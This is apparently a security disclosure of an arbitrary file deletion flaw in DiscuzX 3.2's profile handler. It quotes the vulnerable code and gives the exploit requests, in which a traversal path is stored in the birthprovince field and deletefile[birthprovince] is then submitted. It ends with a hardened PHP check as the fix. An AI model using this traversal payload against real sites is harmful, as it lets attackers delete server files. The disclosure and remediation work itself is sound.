DiscuzX Arbitrary File Operation Vulnerability
Strictly speaking, this is an arbitrary file deletion vulnerability. The deletion call itself is easy to locate, though, so it is not spelled out in the summary or the title.
I downloaded the DiscuzX 3.2 code yesterday.
The following code is in source/include/spacecp/spacecp_profile.php:
    if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
        foreach($_GET['deletefile'] as $key => $value) {
            // only checks that $key names a known profile field, not that it is a file field
            if(isset($_G['cache']['profilesetting'][$key])) {
                echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
                // $space[$key] is user-controlled profile data, concatenated straight into the path
                @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
                @unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
                $verifyarr[$key] = $setarr[$key] = '';
            }
        }
    }
$_GET['deletefile'] is not validated anywhere, and $space[$key] comes from:
    $space = getuserbyuid($_G['uid']);
    space_merge($space, 'field_home');
    space_merge($space, 'profile');
So what is needed is a field in $space whose value we control and that can hold the path of the file to be deleted. The field I use is birthprovince.
First, we store the path of the file to be deleted in birthprovince and save the profile. On the next request we submit $_GET['deletefile'][birthprovince], and the file that $space[birthprovince] points to is deleted.
In other words, we submit birthprovince as ../../../robots.txt.
After saving, $space['birthprovince'] in the database becomes ../../../robots.txt. When we then submit $_GET['deletefile'][birthprovince], the file that $space['birthprovince'] points to is deleted.
Procedure:
After logging in, submit:
birthprovince=..././robots.txt&profilesubmit=1&formhash=85cf7ef0
Note that 85cf7ef0 is your own formhash.
to:
http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base
Message: saved successfully.
At this point your birthprovince is ../robots.txt, and the resulting $space['birthprovince'] is ../robots.txt.
Next, submit the same parameters:
birthprovince=..././robots.txt&profilesubmit=1&formhash=85cf7ef0
to:
http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa
Done: the file is deleted.
Solution:
Check that the key supplied in deletefile refers to a custom profile field that is configured to hold uploaded files, rather than accepting any profile field whose value the user can set.
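A hardened version of that check, as an added example (not Discuz's own code): it only proceeds when the requested key is a profile field configured as a file field, and when the stored value is a bare file name that resolves to a file inside the profile attachment directory. It assumes the profilesetting cache marks file fields with 'formtype' => 'file', and that $attachdir holds the value of setting/attachdir.

```php
<?php
// Added example, not Discuz's own code. Decides whether a deletefile request may
// proceed: only file-type profile fields, and only paths inside attachdir/profile.
// Assumption: file fields carry 'formtype' => 'file' in the profilesetting cache.
function profileFileToDelete(array $profilesetting, array $space, string $attachdir, string $key): ?string
{
    // 1. The key must be a real profile field (this is all the original code checked).
    if (!isset($profilesetting[$key])) {
        return null;
    }
    // 2. The field must be a file field; a text field such as birthprovince
    //    must never drive an unlink().
    if (($profilesetting[$key]['formtype'] ?? '') !== 'file') {
        return null;
    }
    // 3. The stored value must be a bare file name with no directory components.
    $name = (string)($space[$key] ?? '');
    if ($name === '' || $name !== basename($name) || $name === '.' || $name === '..') {
        return null;
    }
    // 4. Resolve both paths and require the target to stay inside the profile directory.
    $dir  = realpath($attachdir . '/profile');
    $file = ($dir === false) ? false : realpath($dir . '/' . $name);
    if ($dir === false || $file === false) {
        return null;
    }
    if (strpos($file, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo data: a temporary attachdir with one profile file and one file outside it.
$tmp = sys_get_temp_dir() . '/dzdemo_' . getmypid();
mkdir("$tmp/profile", 0700, true);
file_put_contents("$tmp/profile/avatar_1.jpg", 'x');
file_put_contents("$tmp/robots.txt", 'x');
$settings = ['birthprovince' => ['formtype' => 'text'], 'avatarfile' => ['formtype' => 'file']];
$space    = ['birthprovince' => '../../../robots.txt', 'avatarfile' => 'avatar_1.jpg'];

var_dump(profileFileToDelete($settings, $space, $tmp, 'birthprovince'));                      // text field
var_dump(profileFileToDelete($settings, ['avatarfile' => '../robots.txt'], $tmp, 'avatarfile')); // traversal in a file field
var_dump(profileFileToDelete($settings, $space, $tmp, 'avatarfile'));                         // legitimate profile file

unlink("$tmp/profile/avatar_1.jpg");
unlink("$tmp/robots.txt");
rmdir("$tmp/profile");
rmdir($tmp);
```

Only the third call returns a path; the handler should call unlink() on that returned value and nothing else.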